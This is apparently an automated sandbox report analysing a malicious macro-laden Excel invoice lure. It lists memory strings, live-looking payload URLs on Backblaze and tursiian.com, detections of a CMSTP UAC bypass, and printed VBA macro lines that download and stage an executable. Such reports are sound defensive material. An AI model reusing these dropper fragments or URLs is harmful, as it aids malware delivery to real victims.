                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: PO202502DAKE.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: 7z.exe, 00000009.00000003.1298204632.0000018569650000.00000004.00000800.00020000.00000000.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316165651.00000273D2C02000.00000004.00001000.00020000.00000000.sdmp, PO202502DAKE.exe.12.dr, PO202502DAKE.exe.9.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317182210.00007FFC9D073000.00000004.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316889044.00007FFC9CE2B000.00000004.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455966611.00007FFC9CFC3000.00000004.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454840473.00007FFC9CD7B000.00000004.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 00000021.00000002.1537822596.00007FFC9CE2B000.00000004.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 00000021.00000002.1538126610.00007FFC9D073000.00000004.00000001.01000000.0000000F.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.drString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317182210.00007FFC9D073000.00000004.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316889044.00007FFC9CE2B000.00000004.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455966611.00007FFC9CFC3000.00000004.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454840473.00007FFC9CD7B000.00000004.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 00000021.00000002.1537822596.00007FFC9CE2B000.00000004.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 00000021.00000002.1538126610.00007FFC9D073000.00000004.00000001.01000000.0000000F.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.drString found in binary or memory: https://aka.ms/dotnet-warnings/
                          Source: PO202502DAKE.exe, 00000021.00000002.1537822596.00007FFC9CE2B000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
                          Source: PO202502DAKE.exe, 00000021.00000002.1538126610.00007FFC9D073000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility0
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.drString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
                          Source: PO202502DAKE.exe, 0000000C.00000002.1317099796.00007FFC9CFCB000.00000002.00000001.01000000.00000008.sdmp, PO202502DAKE.exe, 0000000C.00000002.1316763168.00007FFC9CD8C000.00000002.00000001.01000000.00000009.sdmp, PO202502DAKE.exe, 0000001C.00000002.1454603061.00007FFC9CCDC000.00000002.00000001.01000000.00000010.sdmp, PO202502DAKE.exe, 0000001C.00000002.1455259639.00007FFC9CF1B000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1538038684.00007FFC9CFCB000.00000002.00000001.01000000.0000000F.sdmp, PO202502DAKE.exe, 00000021.00000002.1537704018.00007FFC9CD8C000.00000002.00000001.01000000.00000010.sdmp, libcares-2.dll.12.dr, libcares-2.dll.9.dr, msvcp290.dll.9.dr, msvcp290.dll.12.drString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: vbaProject.binString found in binary or memory: https://f004.backblazeb2.com/f
                          Source: vbaProject.binString found in binary or memory: https://f004.backblazeb2.com/file/mdocument/PO202502DAKE.zip
                          Source: vbaProject.binString found in binary or memory: https://f004.backblazeb2.com/file/mdocument/PO202502SNAKWS.zip
                          Source: powershell.exe, 0000000E.00000002.1354321953.00000260CE988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 0000000E.00000002.1379798537.00000260DE7D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: vbaProject.binString found in binary or memory: https://tursiian.com/7z.txt
                          Source: ~DFE94CD9633EB51867.TMP.0.dr, vbaProject.binString found in binary or memory: https://tursiian.com/7z.txt$
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownHTTPS traffic detected: 149.137.128.16:443 -> 192.168.2.4:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49737 version: TLS 1.2

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 33.2.PO202502DAKE.exe.21bc50716a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 16.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 28.2.PO202502DAKE.exe.1ff210716a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 12.2.PO202502DAKE.exe.2333c8716a0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 12.2.PO202502DAKE.exe.2333c8716a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 35.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 35.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 33.2.PO202502DAKE.exe.21bc50716a0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 30.2.aspnet_wp.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 30.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 28.2.PO202502DAKE.exe.1ff210716a0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 16.2.aspnet_wp.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 0000001E.00000002.1451318237.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 00000023.00000002.1536508110.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Source: 00000010.00000002.6605477392.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                          Source: screenshotOCR: Enable Editing Required 10 11 12 Please click 'Enable Editing' to allow the Invoice Viewer to functi
                          Document contains an embedded VBA macro with suspicious strings
                          Source: PO202503D.xlsmOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
                          Source: PO202503D.xlsmOLE, VBA macro line: Open Environ("TEMP") & "\invoice_log.txt" For Append As #fileNum
                          Source: PO202503D.xlsmOLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
                          Source: PO202503D.xlsmOLE, VBA macro line: currentPath = shell.Environment("PROCESS")("PATH")
                          Source: PO202503D.xlsmOLE, VBA macro line: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath
                          Source: PO202503D.xlsmOLE, VBA macro line: temp = Environ("TEMP") & "\invoice_temp\"
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function ExecuteFile, String wscript: Set shell = CreateObject("WScript.Shell")Name: ExecuteFile
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function LogMessage, String environ: Open Environ("TEMP") & "\invoice_log.txt" For Append As # fileNumName: LogMessage
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function AddToPath, String wscript: Set shell = CreateObject("WScript.Shell")Name: AddToPath
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function AddToPath, String environ: currentPath = shell.Environment("PROCESS")("PATH")Name: AddToPath
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function AddToPath, String environ: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPathName: AddToPath
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function ViewInvoiceOnline, String environ: temp = Environ("TEMP") & "\invoice_temp\"Name: ViewInvoiceOnline
                          Document contains an embedded VBA with functions possibly related to ADO stream file operations
                          Source: PO202503D.xlsmStream path 'VBA/Module2' : found possibly 'ADODB.Stream' functions open, read, write
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function WriteBinaryFile, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.zip")Name: WriteBinaryFile
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function DownloadFile, API IServerXMLHTTPRequest2.Open("GET","https://f004.backblazeb2.com/file/mdocument/PO202502DAKE.zip",False)Name: DownloadFile
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function LogMessage, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_log.txt")Name: LogMessage
                          Document contains an embedded VBA with functions possibly related to HTTP operations
                          Source: PO202503D.xlsmStream path 'VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function DownloadFile, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, sendName: DownloadFile
                          Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function DownloadTextFile, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, sendName: DownloadTextFile
                          Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                          Source: PO202503D.xlsmStream path 'VBA/Module2' : found possibly 'WScript.Shell' functions currentdirectory, environment, exec, run, environ
                          Office process queries suspicious COM object (likely to drop second stage)
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CE93D90 SetLastError,NtUnmapViewOfSection,GetLastError,12_2_00007FFC9CE93D90
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CDE3D90 SetLastError,NtUnmapViewOfSection,GetLastError,28_2_00007FFC9CDE3D90
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FF6220A7ED012_2_00007FF6220A7ED0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FF6220A57C012_2_00007FF6220A57C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FF6220A43E012_2_00007FF6220A43E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC6BCEE12_2_00007FFC9CC6BCEE
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC63CC012_2_00007FFC9CC63CC0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCDFC8012_2_00007FFC9CCDFC80
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC99ED612_2_00007FFC9CC99ED6
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC63E9F12_2_00007FFC9CC63E9F
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCABFF012_2_00007FFC9CCABFF0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCDB90012_2_00007FFC9CCDB900
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD15A2012_2_00007FFC9CD15A20
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD0F9A012_2_00007FFC9CD0F9A0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD0DC6012_2_00007FFC9CD0DC60
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCA7BA012_2_00007FFC9CCA7BA0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD214B012_2_00007FFC9CD214B0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC9165612_2_00007FFC9CC91656
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCA362012_2_00007FFC9CCA3620
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD0D5C012_2_00007FFC9CD0D5C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD0F5C012_2_00007FFC9CD0F5C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC7786012_2_00007FFC9CC77860
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD0180012_2_00007FFC9CD01800
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC7F78012_2_00007FFC9CC7F780
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCFF0C012_2_00007FFC9CCFF0C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD0F24012_2_00007FFC9CD0F240
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCDD28012_2_00007FFC9CCDD280
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC78E7012_2_00007FFC9CC78E70
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC7EE6012_2_00007FFC9CC7EE60
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD0EF4012_2_00007FFC9CD0EF40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC7EF6012_2_00007FFC9CC7EF60
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC94A6012_2_00007FFC9CC94A60
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD10C5012_2_00007FFC9CD10C50
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCD8BE012_2_00007FFC9CCD8BE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC6E76012_2_00007FFC9CC6E760
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCD882012_2_00007FFC9CCD8820
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD167D012_2_00007FFC9CD167D0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CC967E012_2_00007FFC9CC967E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD7E12012_2_00007FFC9CD7E120
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCBC25012_2_00007FFC9CCBC250
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CCA023012_2_00007FFC9CCA0230
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CD1233012_2_00007FFC9CD12330
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEB7D4012_2_00007FFC9CEB7D40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF4BD6012_2_00007FFC9CF4BD60
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEB5D8012_2_00007FFC9CEB5D80
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEA98C012_2_00007FFC9CEA98C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEA39DF12_2_00007FFC9CEA39DF
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEC79C012_2_00007FFC9CEC79C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEE1B4012_2_00007FFC9CEE1B40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEDDAC012_2_00007FFC9CEDDAC0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF4B58012_2_00007FFC9CF4B580
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEDB6E012_2_00007FFC9CEDB6E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEB186012_2_00007FFC9CEB1860
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEA380012_2_00007FFC9CEA3800
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CED97DD12_2_00007FFC9CED97DD
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF3D22012_2_00007FFC9CF3D220
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF4522012_2_00007FFC9CF45220
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEB736012_2_00007FFC9CEB7360
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CF4740012_2_00007FFC9CF47400
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CFBD28012_2_00007FFC9CFBD280
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEB746012_2_00007FFC9CEB7460
